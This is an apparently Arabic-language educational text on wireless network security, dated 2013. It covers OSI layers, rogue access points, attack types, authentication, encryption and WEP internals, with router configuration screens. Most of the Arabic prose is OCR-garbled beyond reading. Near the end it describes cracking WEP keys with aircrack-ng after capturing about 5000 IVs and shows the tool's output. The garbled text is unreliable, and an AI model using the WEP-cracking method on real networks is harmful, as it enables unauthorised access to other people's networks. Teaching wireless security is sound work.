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4 \\\,^\W ClAfLuIull ^3 jjuflia, a\\ 


OlSLjJl 

4j15^j J Aiil ^ ^.^Ap 

wLxj La| 4^-e-s^ J 3 J wUis^- ^Lp J d*^L^]\ J A& <-L«3~l 

olS 2 juJl j a^SCL^^I olS 2 juJl Ip 3 a^_U c_aI^^ a^-l ^^p — blij^ j Ls^-jL* j a3 ca~33j <-^p^ la^_$ 

^y» dy'V^SP ^ aj^> lA A^aJL* j Cd4A. Wireless ^>>jI.jJ c_aLJi j ^S3^>i a33>>*}\Ji 

CCNP Wireless jL^ 3 l 5 ^Jl-MJ! jf CWNP 

£_jj!j j£ A-jS^I L« ^JLp jU ^- 1 *j V j 

jf wireless4arab.net OyJlj (jylL?ljJJ A^LL>i*)\J| olSC-dJl <^jy£ ^i3y* yS* oLjjJj j O^UL* A^Jk ^lp L* jJU 3jl 

a-3JL**3!I olSLiJ! a !4 jt networkset ^U 

(_^aJl ol^LjuJl ^1 Ip 3 <-^3-^31 3A3 jJ^ j a^Jujl j u ^ 4 c/ 2 ^ 3 ^ l 5 ^ aI^II j 

<Laj3-l CaI^J * 4 olk»i j C^JA^j c_^~3 """JiL* J ^L)I wijAa Ajj-JAj 

A^SI^a c-aIiS^ j OV! (j^j ^aJl I3& Jit* { jp^>- <-Ac^ a^j* j-^3* j J^IS"*c_aIj O^Ssj l^aip j Aiiliil a»L>-4I j 

a\)I £.L>> ol Ia_& Lj jLww*> (_^aJl ^tJLJuj1 c_aIxS^ 3^ j WCS a-j^L>i*)\JI ciaIS^-aaJI 

ol3_*Jujl ca^IS”* wbwLc j A-^Jjjfc j Wireless 4^C1 c_aIxS^ OjJl Jli c_aIxSsJI l^-up l^ajLP a!>- 4I L«l j 

a&! ^L>> ji Jj>rL*Ji (3 j Ljjij aja« li^aaI CCN^A "V^ireless c_aIxS^j 

J ^1 jJL$ laJ> J A-J^'yi J AjwOslstil Aj^La 3 J C_AlxSCil 3 J ^ J 

ajjJi (j* 4 j ^ 3 j j A-w<»JjJl 

J-ojJl J J <&\ Ua3 J 


^ 3*1 j^U 


2013/3/19 

naderelmansi@gmail. com 
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4 \\\, ^\W djliLdull JjX ^3 jj l dd *\\ 


adlL/M Olddl J jkdJj 


Dial 4^oa>- cj 15"U. j ajl^r Jj^-aJl jd& 3JjL^- L«jj (_!, ^d>- a?-1 01 ^S"".il 

j\^*d <L*wlXl J$y* ^jlX c£y>-1 & J* (jLy^J^ fil^lpl ^ dJjO^I (JL^2j1 jUj j»^j2J 1)1 l ^ **>- jLp- ajX ^X Up 

(1)jJj Ajj^dilo fli ^AJwL^23 c AjX jSCil <J^PO £d<»^>> ^j'X (Xfc j\Ou X L$dpL» j*_£3 !XCk j 4j ^sliMlP 

Networkud j^o> ^0.1 IP *U.^AJ OXl J oUjJ j»IJo>cdX 

^jyald) wLs^23 j^P j! wLy23 j*_£3 ^P <Jjj Jl*X| lX5> AjLiXj J ^£>-Ly2 j^Xj 1)1 V} ^ ^1 AjL^IsJI oX& C^S>z ^T J 

OSIa 5UJI oULlX liX aSUXI 

dj^ IdpL*^* A^^dXl djULX d-^ jijaJ oXq >^2 (^wL* 01 ^ly&l ^ d^-dj 1XA oa^ 2 1 L* 

A^XdX ^jyslj j\SX l)I OXd *y j ^Jpl ASv-dXJ OXdX jlS" Lis" OSI d^lilX j*-L» 3 <dXjJ XlS*" Aol X j 

A»<^«^Jl ^^**u2«o ^ A^Xu^Xl lj /01 00 A»ca««^»o i 1_2 Idj2> ^ *■, Jl-‘^X ^l ^ X-1 ^P tolj^ AiUXl J3 

(§) ^(^pl L5^ J L5^ XXSXd ( JP XX J jP-Xl 

A-jIjJ-OJ! AjXXJ IjLX O^X jdxj* A-H^IXl dJj!i j 

dk/^ ^p jl oLajjysJ I ol^LO^ 4 oL^jj aIs^I^j Oi-!i j ajuLJI a^JXI (3 Ad«jl2JA« Xl2jl La« j 

aXU^ji oisUji j ur SSID 

Aiij^p-'y i^Jjd^o 01 jX-jo port Xiid« (3*iAp b oXi j session aJLX (3 ^j- 4 id* j 

A.^s^owXl AjS^wXJ LfiX? A»<^\»ow<j ^ l_Q^~ l~*d^ ^ 

j PI5C Jd* Jjij^jlXl J ISA oL^J Jd* (^jd^vw* ^lwL>cdwolj aSUJI oUjJ J XldA j 

Bluecoat 
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4 \\\, ^\W ClAfLuIull Jyol ^3 


4-24^1 ^ J 4-22«^l L^L?rLx>-l ^ip ^_3 jXl) l)1 A^L^Sj (j\ 3 1J-J (1)1 I Jor ^£JwlJl ^y» j 

Jujciij (3 group policy 3 bJiu ig^^?llj ^>-'y 1 ^ysjtJl aSC-^Ji olySC« 'V 

ajjfc L 4 JP joJ £jjL j£ logic 4 -cL>P <L$CLwo*>U! olSwtJl 3 jJwLjj 




Web authentication 


Application ;u~kJt <cui Ji physical <y.>lLl 4^u ^ OSI JyC^ oUi> aii£o _/ J^l «jm> oU yy US' 
j L5 SCL-yJ( o,lS2l J-juL' j Layer 1 physical JjSn uJaJl Ji<^ OSI ^ jyii> yZ s^k* ^ : Start 

rjA j U jL^yJ 4^$CL-u*)Ul sSOiJJ ^a>&x*At jLx>-i ^y«j sSOiJl j (jjj 4j14j j s^Liyi ^ (j-^ 

jt^Jr! open «j^L" % aSCLi e-sis' jii Layer2 Data Link 441 uLJi fay L* j yiis J^i yksl ^ 
, WEP Ji4 layer2 security oVjS^Jjjo sSCLi cals' 01 j DHCP lyiii? oUJi s^kUJ Ju^l 
ejLsJU el o o*)i<u» Ji^oi 2^ ^a>c^J.i ^b>s_>~v IEEE 802.lx, ^X/PA, "W^PA.2 

DHCP y j sJUi 

2 jl^- £-h>^ cy^ Layer 3 Network ^41 uLJi J^Ldi 4 *^ Iju jJi j 441 y^ii ^ : DHCP 
web authentication ^jJi jJy ^ ^JjJi aLSLa cals' lit yi ^i aSLaJi ol.^ Ji IP Jl 
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4 \\\, AA\' ClAfLujoll Jyol ^3 


Juo^Ssj (1)1 Ll& iJUjjj ^S' Jc>-Jj elijlS - " Jjj-^ AoJS*" J JUol Jj^J (_g\ 

«Jl* ^ ji^ j Layer 4 Transport uT c~Hpi dj£s I m 5 yjlkli oJoblj jUab y\ aSLhJJ yL-jJj 

TCP\IP S&v. 5>^t 


oULj <J^Lj j jUx>-l j 2^I?r Jjl aip (3 4$ChJl lay TCP j IP oUL; yLjib a*j : JVlobility 

Session y~«bL uLJi 

Layer sjlL ^ L&jyLiJ j obLJl <Jhvuji j (JiyLxy <yL>»p- lay j sSCiJi J^jJb jb^Ti i-y y* ; Roan 

Layer 4*jLJi iiLJb OSI oLL^ ^ ^ obLJi Jy jf ^y^b jl^Li ^ of y*y j 6 Presentation 

7 Application 
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4 \\\, ^\W ClAfLulll Jj-ai ^3 j ^ ^ *\\ 



Ji j C-Jjib'yi olSs-^ (3 Jj>r^j ^jJl ctiJj L^- 4 ^l*J ^jJl 4-JL«^l cl)U ^SCLwo^J! OiS^-dJl 4-^j-v^ji- l^jfij 

A-JL^^yi ^P L& ^-l^ULw*> c L^-Jl aJ i^i^j A^^L-vJl ^J,l AjIjJ o 

L&j*>-j a3s-L>>^)UI 3 ^ 


Rogue AP and Rogue Clients 



Client ARP 


L2 Switched Network N 


Trunk Port 


Authorized AP 


Rogue AP 


Rogue Detector 
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4 \\\, ^\W djliLujall Jj-oi ^3 


^ CdL^-d*JI {\, UJl 1 aJL>- jJl I dj^_?r I ^1 4-Lt>-djl ddLj^J ^ja**a**S**^\ ^jd*J 

L^jL>>l J^LdJlj lA L£ 4-^-L>>*)Ul A^diJl djL>>! (3 o ‘^ Te -? J c3jjr^“V^ cii-ta 


AD HOC Network 


O 


Intern* 


Mote* 




compote? 



computer 


^SCL»*>U! d^ijJl j a!^*j a-^1LwJ| ^SCddSb J^l3 jW^ { j^>^ ^jJL> L*Jjlp 

4jI^j 4^*j2j cii-SAj j JjJU Jd!l 4SCdd l£ djL^r LSs-L^^ j Jjb>dJl 4-01^*^ Oi/^^ ^d£j 4 jU 


j (_^li (_£ljJl JJU <L$CL>>*>U! \^>y^L>- I Aild* ^b J \^j^\ Jjlp clr^ Oil 

A^duJJ Idi-AP ^ L)jiy>-^^ J^ddvo *y (3^" ^ ^i-Jl 


Client misassociation 
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4 \\\, ^\W dllSjjulll ^3 Jjuflia, 3\ 



LluM^ b£ JLv^j^Ij d^wo.3 (_£ b l */ 2 ) \ d^L^-dwJb ( > ^U l */2 ) 1 I d^l^ltA^' S yi 

ajISOi br ddjjj ^-dSu SSID ^Ss-L^^AJl olSCdJl ^jJL> ^ bb^-^l (j- 4 (3 j 

L^dj ^jJl ^wJLwo'yi ^4 |j^ j ^X<>>-ip l)j^j j ^jlj y*\ (j-z*y ^ 3^3 l)j^j 3 l)1^® (3 aSC-Jlo ^fJJL^ 2 jl 

.lijL^-; d^-**Jb ^jJb dbJ iJdu>- 4-^-b» ¥ )bl olSLdJl ^*l>c3 b* 


Wireless attack 
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4 \\\, AA\' ClAfLuIull ^3 jj l *\\ 


^JL) *V j C-JI olyu £~y^\ j laoL£! (3 y*Jl J-Jl ciiJ c-JlS"" a&jLJI ^i?L>c_l.l 

jsijo^-'y^ j-& j ij^s^ o^ijoitJ.1 L^-j-p dy^ j ^sdL»*>ui ip 3 OyaiAi vi ljip 

£>rji IJj& j lA J^UJl JyjbJl j^_Pj <LSdL><*)Ul 4lSd-J* ^y* ^Lp Ll* j^xSo d^ju 2y>rj l)jJj J 

^j^pjj ^1 l^ 3 ^ J 4-dd>>*)U! JL>-I Ly c^wL>ti^! ciiJjJ j ^ii^jo^-l ajy>- j oyJ lil j ciAiLi*J 

Active Attack j Passive Attack u* 

passive attack 

{jk f probes ^JL»*>0i oISLjJi ol^ capture i?UiJb ^ oU^ ^jbtu-b ^ passive attack uti 
eiJi j ^SCL^tAJi jLjJ«i j «Ua!i j jyLh^Ji Jit* aja^Ai olAAi (j^ 2 ^ s-tj eAJi j analyzing LgJ_AcX) 

aSAA eJjtliplj La-1*j ^jJLJ aSAA (3 ji j2 >-“-^ j Cr 4 *^^ (_£yiA» LaJs Jjjj jl ^ /»& jj c~2^Ji 

Active Attack 

aajLJi d^® ^jlp Active Attack l#i j 

^Sd-jJl Jj>-1 \uy2S>zJji d' J>6 ^^ j-& d 1 ^"^ CL$ J ol jbjy^ J jJjjfuS^ dj-4^rl ^i-P -CoJjo j3 oL^rjJjd^ J 

dil LU 3jd~l ^1 V 3J1olij^Ll ^ y j man-in-the-middle j! Rogue AP 

aJL. 12^ AJLI3 *y J J*i& Ojwb T ^ - -a *T\j| J 
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4 \\\, AA\' ClAfLulll ^3 j ^ ^ *\\ 


Authentication -Encryption 


Switch 



Aftackar 



j*\ 2L^L-^J| olSwtJl (j j <LSCLxJl Aj>rU-l j olSC-dJl wL^UL* Jj>-I jJk 

J^Lax)! ^Ix^- C-Jli <LSCdJ! olSC^JxJl AJjdjr ^j-aj ^SCU c 4JLP y j ^Jlj 

Ju^»l j^^li 4^SCj^o^>\J( olSLjd U»1 c ASLjxd ^ j 3 j ^ 3-*^ J jL^Jrl (JJ oL5LJ!C3.ptIirc 

authenticated jjyJ ^ j Encrypted ^ lid, l J CXJJjJ I Ojdl J-p- 3 ^Lj^} 


4^-^juJJ ^ ^ xj>- 


Authentication 

aS^dJ I l^N-wuvsJl ^ $.^ 11^ ^ ii^i sJ^p ^ Authentication ^ sUa j 

bl Vi a 5^I Jl Jyo £zj?tzJj ^j} jdU-l ^AS*" 3 J ASdilJl jL^j>r jl { j&s>zJjj J^>0 4-^Lc^ j 

<LSCdJ! olSLjd 3 jd>r d-Si j d Data Link Layer 2 ajIx!! aJLLSi js* Jd2ji d)l ^iLxd 
IP j.s> Network Layer3 ddi 4dkii ^ od-Sli 3 j ol^Ldl 3 cJj-j i _ r ^S\ /\ 

a] ^d? 
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4 \\\, ^\W ^3 Jjuflia, 


Authentication User 


> 



SLjaj^l 3 <J^>0 J 

ajjuJi ai^! ^ j Password jjJ.1 3^15' Jju Something you know ojyj ^ijb^b yjyii liy 


Jg.34-1 ' g ^^S-J j yiJ 


Smart Card^iJi ^yyi oj/'Ji« Something you have 4Shi jjydl 

OyJi a^-ji jf fingerprint wj Ji. something you are dL^> ^ fLb^u-L jJyJi U!U 


Authentication Devices 


Authentication 



User authentication 

4 -► 


If password 
stored on device 


4 


User authentication = 
Device authentication 

-► 


(_h>o ^up qLo ,/t\ oiJi j sSCjUJ Sj^gr'yi jj.Jy jjp lit* j djpo jjJyJ JiylaJl 

^lapcju^i ^ t i y ^*Ji Signature jIs • ^ cpLL^yi* ULl^ y-oyj 


4jcV* ^ ^Jp-Uj (jjJl ^gPc^zJl ^p 
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4 A\ I AA \\ L " 4 S. n n\l ^3 


Encryption 


Plain Text 


\ 


Encryption Process 
or Cipher 


"Computers were invented 
as a natural progression 
from a calculating 
mathematical machine..." 


\ 


Change a to d, 
then d to 5. 
Change b to i, 
then i to t. 
etc . 


\ 


Cipher Text 

\ 


ag65re{Shnsf5 
4 ke Jskfjoei 
slkfhowie n sjf 
iunehfoigtrb ... 


Key 

i 


a is li, b is I. 
c is 2, d is !, 
etc... 


Plain Text 


l 


"Computers were invented 
as a natural progression 
from a calculating 
mathematical machine..." 


fLbtu-L unreadable jj* oUL; Ji Plaintext oUUi y> Encryption jyLiJi 


key jj^\ tfjULc jJl j' Ji oliUl jU^J eJJi j Cipher iL~L- 

DecryptjyLidi dii SL-J.I v^Cii aJ^Ji 



Cipher 


O 

0 

E 

E 

>. 

co 


Plain Text 


“Computers were invented 
as a natural progression 
from a calculating 
mathematical machine. .. 


I 


Key 


Cipher Text 


I 

—► 


agt5re(6hn$f5 
4 ke .Iskfjoei 
slkfhowie n sjf 
iunehfdigtrb ... 



Plain Text 


"Computers were invented 
as a natural progression 
from a calculating 
mathematical machine..." 


Cipher 

O 

0 > 

E 
E 

>v 

CO 

< 


Plain Text 


"Computers were invented 
as a natural progression! 
from 3 calculating 
mathematical machine...* 




Key 



Asymmetricj Symmetric u* jUy « 
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4 \\\,^\W ClAfLujoll Jj-oi ^3 jjuflia, 


Symmetric encryption 


Key ^-bulJ cipher jJlas aL~L- aJL p yci Symmetric encryption uu 

^uLjhdli uic encryption ^jLjvjA! eA_S A_w ^uLj*jA! eA-^ a^L^-p c3 

L^s ^jA! 2 ,> lx i y i j L^2 jI ^y*-*' _j (3^" La^So cAJAJ j j <lK*Ji aJjk ^decryption 


Asymmetric encryption 


°y cr* r^' 



Key ^ uk&- cipher jJlX aJLJL, jJl^\ ;lL^ ^ Asymmetric encryption l*t j 

djS d)j^O LaJjLP aJjk ^Jj>c^o j ^ Ji5^ J j^LJUxSl ^1$ <LKp (3 

* 

°~h cr* r^ 1 


Common Key 


Key Management 


Individual^! Common Key U*a^l jjj .Jl eAi ;cK*J cx^kj* f'a^A ^ 




Blue 



Blue 


JSA ^|j*_a! ^j^»yi o^wj^sJl ciaISCxJJ ^A -i 2j j^l ! !A^ ^ aj ^~buL^ Ixa 

oLJJs j*-S”"aJtIjiL Aj^Ij j *^^-1 _j otalwXpy a^-Li^-I j^yi IA_a <—-j«j ^^SsJ j oL?- 1 ^ 



Individual Keys 
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4 \\\, ^\W ^3 Jjuflia, 



Red Green 


j dj^-L s^ij j ^^\ !ju& j 4j ^Ixa» ^J>tX^«v4 Ji” ^J>tX^«wwu La 

oLli? j*_S”"SJrbtL j\S”"l O-®J j^b _J J ol^l-Lp*^ 4 j 5 rLl>-! IJa ^jSsJ _J oL>-*)La 



J 
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4 \\\, ^\W ClAfLulll Jj-ai ^3 j ^ *\\ 


Wired Equivalent Privacy (WEP) 



jL*l LLis jJi ;uSCL-yJ! olSLaJU j encryption algorithm oULu 

data confidentiality oULJi 5 jLJ- 1999 ^ jy^ j i^soU^i ^ j IEEE 802.11 

‘USO.^yJl olSEaJl sEwu j Jjl eJJOj ju*j j A^5\J-w«yJl d^lSEjOl ^-yy- jJiSSj , 


F ( J ^2 ^y> bj_jtaj j 802. Ill jL*ll jj^Js *C*j <JljjJl) Ji <LjJL0l ®0 jsi yyp 01 ^ _J 

01 Jj j Ajjy.aAi -0 yJijV of *yi Wi-Fi Protected Access (WPA) ^bAlliance 

i3y>yi j ^0 ('A) f* 4-ydai I (3 a^-lS^4j^*^2j 0 a .yg u 


aSU%\ iojjJl 
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4 \\\, ClAfLulll ^3 


802.11 Header 


BSS ID 


Initialization Vector (IV) 


Destination Address 


Logical Link Control 


Sub Network Access Protocol Header 


Data 


Integrety Check Value (CRC32) 


I j us" jjSo j Wireless Packet JiSu jj* 

jt-* J JSCjJ! (J jjJl £jJr! 


yS\k«yJi caisCaJi yp ^ 4yySi ^ 802.11 I leader — 

AP MAC oyy s'SO ^JbyiJl jiy*Ji y& j BSS ID Basic Service Set Identifier - 
jJ> JSCo JJkiJ.1 j J^U JJ y* 4j L^i J\y^ (*ij IV initialization vector - 

WEP j y* j WEP Key y LJl 

Encrypted ^ Ujk j obbJl Js- yysi jJi ^ 3 ckUl «.lyd ^b 


WEP j*aj 

Ron's l5 ^-j stream cipher jJjc vjjlp 1 WEP ^jb^o aXL-^i obUt Encryption jkad 
symmetric 5i;u^ vjj'y 1 RC4 yy, 5 Key system l y obk jJyiCode 4 (RC4 
jjs- eb (3 J^ll aip j^jLjuxJI ^ algorithm 


jliJi j jt$4! j yaJi jyLiJ! ^ y* j WEP Key y> bJy yjy- Ji Key system Jf j 
^j^CwvO b^l ^Jo ^ 24 bit L* ^ j jkaJi 2 JLou yU ^ij^p j*jj y> j initialization vector (IV) y> 
128- j 64-bit WEP ^ j r/\ oyj Ji yjJi Key System WEP Key Ji 

256-bit WEPj bit WEP 
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4 \\\, AA\' ClAfLujoll Jpol ^3 jjuflia, 


_ r ^p ^ijl- 10 byte Js- ^yA (WEP-40) u^f ^ ^Jdi 64-bit WEP uU 
initialization aiu»i ^ 40 bit j 4 bits JIp c^.b JS' (0-9 , A-F) hexadecimal 

64-bit WEP Ji RC4 J^*J 24 bit J^k; vector (IV) 

Ji jl jLj JS"” Lfcjijjj j ASCII ^-yJl (jA obbj dbol 2jij4 ^ jiRJl t ^ r 5\J 

40 bit Ji ajbg-Jl (3 J v'*"' C~; 4_oLc 


yup 26 byte JLp ^jA aH (WEP-104) uJ (S ^j ^JJi 128-bit WEP uU 
initialization aib^i ^ 104 bit u^Ji j <^1 4 bits JLp y^ c~>b JS" (0-9 , A-F) hexadecimal 

128-bit WEP Ji RC4 J^J 24 bit vector (IV) 

58 byte JLp ajS/ (WEP-232) Lad ^ j 256-bit WEP system ^ eJbJi jkJi bd j 
aiUii 232 bit 2yb$Ji j 4 bits JIp ^^a c~>b JC (0-9 , A-F) hexadecimal y^p ^Ijl- 
256-bit WEP Ji J^J RC4 J^J 24 bit initialization vector (IV) 

ajojtii hiLk ^jyJl j 

(HEX x 4 bits = WEP key) + IV = 256-bit WEP System 

Ik(24 stream cipher ajyjjjp- aibvk ^ ICey IV ® 

jjjdi ijT 2 uigJi j U plain text ^ XOR aijaj k Keystream 
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4 \\\, Jjad ^3 Jjuflia, 


WEP Engine 



WEP jjy 


Shared Key j Open System u* WEP ^ Authentication yJy)i ^ jyy r°- 


d\ (j\ j liLiu-y (ji of SjUyi yi Open System authentication w 

jvLiJ (3 JiA* ^VEP La j Associate E ^y>y yy yj y>-aj 

aSEjsJI ^ caLLE 



Client 
attempting 
to oon nect 


802.11 Authentication 
Open System Steps 

1) Authentication request lent to AP 

-► 

2) APauthcnticatcs 

< - 

3) Client connects to network 

-► 



WLAN Edit Security la^\A y^ys^Jl ^* l . a ^3 ^ , » -*y yy iJLa ^..>♦" ^, L?. _ 7 ^ 

settings 
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4 \\\,^\W djlSjjoJl ^3 jjuflia, 


WLANs > Edit 

General Security QoS Advanced 


Layer 2 


Layer 3 


AAA Servers 


Layer 2 Security 


None 


□MAC Filtering 


lijt oljW Jlp j jJjdS WEP Shared Key authentication \J j 

i^JL-jj ^ WEP ^LjL> UjyLi^ aJL^JI axj clear-text challenge 

WEP ^LlL« decrypt l&^jLLu <3 ^ 1 a*j 1 ^yL> 

4^^-JuJJ ^ b j b^*JJ ^*b<*-<-*J 1 


t 

Client 
attempting 
to connect 


802.11 Authentication 
Shared Key Steps 

1) Authentication - 


request sent to AP 
<- 2) AP sends challenge text 


3)Client encrypts 
challenge text and 
sends it backto AP 


4) AP decrypts, and if correct, 
authenticates client 


5)Client connects to network 


Aocess Point (AP) 


II 


r. »:©***. 

I. ICW*^- 


3T 

v u 


CjWcc# 
CCS mo dam 


ircitNtT^ 


uui j£\ j jjj \ Shared Key authentication of j J oh <i> iJL» of ^ 01 

^y* ^i s L^Jj>-I ol jl 1 yS\3 c—Sts 

eXs j jyLiuJt a*j j ( J ^3 LLiii j LL! clear—text challenge aJL^J 


19 



























4 \\\, ^\W ClAfLulll ^3 


lwL& ^»A^c_^a^o i^_T^ \ j<ua^j , l ^-^-3 w\*3 ^ i J L^ '\^^EU^ ji^-^yi J5”" (j oi c^i ®)j-^; 

WLAN > Edit > Security ^p i$Ji j jJyJi ^yji i<L> 4 v2^jL ^ijj^sCii dSjt ^ 

settings 


WLANs > Edit 

General Security QoS Advanced 
Layer 2 Layer 3 AAA Servers 

La/er 2 Security Static WEP_ (vj 

□mac Filtering 
Static WEP Parameters 


802.11 Data Encryption Current Key: 


104 bits WEP Static Key (Key Index = 1) 


Allow Shared Key 
Authentication 


Type Key Size Key Index Encryption Key 



Key Format 
ASCII 


Cisco 4 j>c-wvJ ^JLp Aironet AJPs \ ^j^LJ ^W^EP \>zjup o jj& j 

IOS Software 



HAMM 9QZ11B 


FA0l'?l fQi 1 I'A 


KJW 

^-:FRES-5 S^T- 


=V F PF^IS Bf l?.,JFffTY 

'iFVOflr Ma? 


SHIIHJI7 


Lj iIl.'Ihj iipRIriL b * duyv, Id mi 


$ a VIP! Ifr iriciyiiduii linn i V *i Rd di id ?P 2 M 10 


EnoypitJun DIuiIuk 
^ Hpiu 


Artrv^ 

E ici yi rl vmi LU< I d*j» 

Ml> Vj. 


■J0 rw0 j U3r»i?r 


ff ¥JlP bnuypiiun |lMarcstay - 

C icq -'crfftrirl IlKU- i#ii:. ii. I| Fnn r i n-ill"; 


\~ FrnJjir Ppi IPockd Kp/nf 


L r£ 11 bMMjH L-W> rfi 


4cvrrv.+d a4 Euri-V 


SPACES 


A Ft I • ■ Ht-KVICJ-K 
iJVSTEU SOFTWARE 


r ciuh*i rvepiaw ij 


Fn. 3 ypli. 1 n ILiryv 


Lncryi'Ciui' Hify 1 
FnnyrMAn Kniy ? 


Tr^wmli; K*^ 

r 


E n ijyiUkm Ki>^ rtlv.' .jUudNial 


Kuy Slfg 

|ia>m i 


(Jj 1 (_£y a (_£1 C-JjJ 1 «j_& a 
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4 \\\, ^\W dilSjjuall ^3 jj l *\\ 


EXPRESS SECURITY 


NETWORK MAP 

+ 

ASSOCIATION 

+ 

NETWORK 

+ 

INTERFACES 


SECURITY 

+ 

SERVICES 

+ 

WIRELESS SERVICES + 

SYSTEM SOFTWARE 

+ 

EVENT LOG 

+ 


Express Security Set-Up 


SSID Configuration 


1. SSID |tsunami 


I* Broadcast SSID in Beacon 


2. VLAN 


3. Security 


«• No VLAN r Enable VLAN ID: f 


<*■ No Security 
Static WEP Key 

(“ 

C' EAP Authentication 

RADIUS Server: 


Address) 


r wpa 


RADIUS Server 
Secret: 


RADIUS Server: 

RADIUS Server 
Secret: 


I 

Address) 


r 


(1-4095) r Native VLAN 


' 1128 bit - 


(Hostname or IP 


(Hostname or IP 


j Slot 

jUj <&i osLj aJUi SjJfli-1 j CISCO IOS j ^ 




ajjfc 


Wireless Security 


Security Mode: 


En caption: 
Key 1: 

“x Key: 

Authentication: 


Select 

WEP. 


WEP 


40 / 64-bit (1 0 hex digits) v 


Key 1 


Auto v 


Enter the 
password 
here. 


^y*} I I *\j& ^ Ij2^® wCJ^j Lj L~^ljy) I 4-^^-Loj ^ A_Lu ^ ^ 
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4 \\\, AA\' ClAfLujoll ^3 jjuflia, 


Passphrase: 


Default Key: 

Key 1: 
Key 2: 
Key 3: 
Key 4 

Authentication 

Type: 


Make flure that all wireless devices on ^our 2.4GHz (802.11b] network are using the 
same encryption revel and Key. as -defined below. WEF keys must consist of ttie 
letters "o''through T and the numbers^" through lk 9“. 

If this page doesn'l refresh aut&matrcaliy after you click Apply ihen click the refresh button of 
your web browser 


--•. 

Generate Keys 

_ 

The Passphrase feature will automat itilly generate WEP Keys based Ort simple text This 
feaiure is compatible with other Unfcsys wireless products For non-Linksys products manual 
Key entry may be necessary 


Manual Key entry: 

3 1 C 2 C 3 Q 4 

OOOOQODDOO 

oooooooooo 

::::cdodoo 

oooowoaoo 


&: tilts 10 hex digits v 


O Open System O Shared Key G Both 




uf Lfc^'^Jl j interface dotllradio 0 ^IjJl Jl J^jJb conft k_uyi £_kj j j 
jUaiyi ^ of o^f jJ o^ d 2.4 GHz :oyib ^JJi 802.11b ^ LS 5X-t>ui juryi 
interface dotllradio 1 a^ljJl Jl J^aJb ^y^ 5 GHz ^b ^jJl 802.11a yy 

j J»j>- 26 <j\ 128 bit Jjk> WEP f -y y» e2bi]l ^-buiLl ajyj ^yCs* 

VLAN 22 sSUJijUbj 12345678901234567890123456 


ap 1200# configure terminal 

ap 1200(config)# interface dotllradio 


ap 1200(c onfig-ifj # encryp don vlan key size 

apl200(config-ssid)# end 

transmit-key 


«Jl* dj&uJ jSG^- Aironet Client Utility (ACU). ^b^ ^jl^j c-SOii j Client j j 

kbsoy obiapyi u 
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4 \\\,y\W djlSjjoJl ^3 jjuflia, 



jJb yJL* JjJjjj (3 l) JjJjjj 3 j-^ j WZC ^JLp j^iaz^ c^jS' li! L«l 

liSC ^ Setup a New Connection or Network Ji 
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4 \\\, C\W ClAfLuIull ^3 


U 5G> y Network Connections Js- J^au- j ^^51 j j 



jjAixJl uil^tJliUNTU ( JiU <bt>JiyJl (3 4Jl — ~ Ajt C)y OjGi bL?-li L ySAJ (3 J 

l^Ip ^Ai Debian Ja. o>-ij ^ JLp yL.' obujyJb eJJb Li Gnome j Unity j KDE jv L 
j Ubuntu Jl. uksJ.1 oLjjyJi jy. Uy^yb eJJb L j LjA _j Sabily j GOS j backtrack 
^^vL^yJi ^lapyi ^by j> yju si (_1J 4^iwC^si ^y* Liy j i«boa^- ei Fedora 

Network Setting ^ aJj> J^js j yaj! j iLuyil ^by (Jus. L y*s- j 
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4 \\\, ^\W ClAfLudl ^>1 ^3 jj i ^ *\\ 



Location: 


Connections 


□ 

s 

b 


©Help 


General 


DNS 


Hosts 


Wireless connection 

Essid: EcolaCreekWiFi Addre... 

Wired connection 

Roaming mode enabled 

Modem connection 

This network interface is not c... 


s Properties^ 


Qclose 


lr-3 


□ Enable roaming mode 

Wireless Settings 

Network name (£SSID): TheCafe| 

Password type: 

Network password: 


WEP key (ascii) 


Connection Settings 
Configuration: 

!P address: 

Subnet mask: 
gateway address: 


Automatic configuration (DHCP) t 


Q Cancel OK 


terminal ^ j 


sudo 

ifdown wlanO 



sudo 

sudo 

ifconfig 
ifup 

essid 

key abcabc!234 


WEP ^ 


jyLwUxli CM Linear (51ieckscirn a~Pj^A juiaj jy*j i3jk 

WEP !^>>l ^ IjIwLa 4-ip ^y£D dfj IS"" 

V aJI IV 4-jIj-^p oULj AiLl^l j*jl>^VEP 3 j ICcy ^»L»I ^Jj>cjL-*a jyLdcJl J 3 cfJJwkS**" 

oULj l3l VI olJlj d)l j 24 bit 4-jlj-doJl oULJl j joLicJl Jj>~I 

lii j c^sij 5000 Jl>»jI wIaj IV jI^SCj (i4^t^ 3^' J^UL) c^-*2 ^t^vc &$,jyLA plain text 
e ^SUl jA I ^Ijj>cjl^i jjlp d.iii i^^ aJlj l* j d)Co 3 <tif crack ^c _ /3 IjI I wLv^ 

j JLp a*; i^is j 5C (1 lii liUpL^. jf cuSL 5000 Spi/ a*. jikj*yi Ji jJL^j aji aircrack-ng 

apC* > q - ^I 4_lS^^**^1 iap 


25 

































































4 \\\,^\W djlSjjoJl ^3 jjuflia,-^1 


Aircrack-ng 1.1 





[00 

: 00:08] Tested 

1705777 keys 

(got 

156 

IUs) 

KB 

depth 

byte(uote) 








0 

255/256 

1B( 

0) 

78( 

0) 

7A( 

0) 

7B( 

0) 

7C( 

0) 

1 

33/ 

3*4 

C0( 

512) 

DF( 

256) 

04( 

256) 

06 ( 

256) 

07( 

256) 

2 

110/ 

2 

6B( 

256) 

C5( 

0) 

C9( 

0) 

CC( 

0) 

CE( 

0) 

3 

76/ 

3 

8C( 

256) 

8E( 

256) 

96( 

256) 

98 ( 

256) 

9B( 

256) 

4 

1/ 


66 ( 

768) 

81 ( 

512) 

E1( 

512) 

75( 

512) 

FD( 

512) 


Failed. Next try with 5000 IUs. 


Scott ^ j ^^>-1 SjlpL^j: Adi Shamir ^iuJi WEP ^TajIS^i c~Jt ^ JjT ^ j 

j ^ULJi (^jL; ^ a*j ^liSl a^Lp as WEP ^ 1 August 2001 j Fluhrer, Itsik Mantin 

dS! l? j WEP AJa^ 0 j a/s yg>&iLl 

oLjlaJ ^*SCp ^Ip KEY ^ 02 jj ASjLa^ j diJU ^VEP ICey aS^« ^iJJaS^ 

aS2jiJi j^j^J aJLwwoj x^j\s> ICey ca-^jp d)], j ( ja>- ^jJl (Sj>-^S jydajJl 




IV dlis j Agere Systems Jj ^ a^Ip ola^ Ju^i j Sjo^l oly-Jl j WEP ^jk. ^ 

djLiaj! ^y> a>- ai WPA Jg ci)l *yi WEP Plus L&ajo j 

Extensible EAP j 802.IX jljlSj ^ y> j Dynamic WEP j ^ jui ^ dlia^ 
AS^jtJ .Ja 2 $ ^iaj!i ^S\J j WEP ICey (3 j Authentication Protocol 

3COM 
